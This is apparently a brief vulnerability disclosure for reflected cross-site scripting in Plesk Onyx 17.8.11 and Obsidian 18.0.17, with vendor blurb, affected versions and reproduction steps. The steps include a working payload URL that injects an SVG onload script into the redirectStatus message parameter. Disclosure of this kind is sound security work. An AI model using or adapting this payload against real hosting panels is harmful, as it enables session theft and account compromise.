XSS reflected in Plesk Onyx and Obsidian (CVE-2020–11583, CVE-2020–11584)

About Plesk

From plesk.com:

— — —

Plesk is the leading WebOps hosting platform to run, automate and grow applications, websites and hosting businesses. Being the only OS agnostic platform, Plesk is running on more than 384,000 servers, automating 11M+ websites and 19M+ mail boxes. Available in more than 32 languages across 140 countries, 50% of the top 100 service providers worldwide are partnering with Plesk today.

Plesk has simplified the life of SysAdmins and SMBs since the early 2000’s and continues to add value across multiple cloud services. The Plesk hosting platform effectively enables application developers by providing access to a simple and more secure web infrastructure managed by web pros and hosting companies.

— — —

Affected

• Plesk Onyx 17.8.11 (Linux)
• Plesk Obsidian 18.0.17 (Windows)

Plesk Onyx 17.8.11 Linux info

Plesk Obsidian 18.0.17 Windows info

Steps to reproduce

1. Sign in
2. Paste URL into browser: https://[__hostname__]:8443/smb/app?redirectStatus%5Bstatus%5D=error&redirectStatus%5Bmessage%5D=%22%3E%3Csvg/onload=confirm(document.domain)%3E

XSS URL (Linux)

XSS (Linux)

XSS (Linux)

XSS URL (Windows)

XSS (Windows)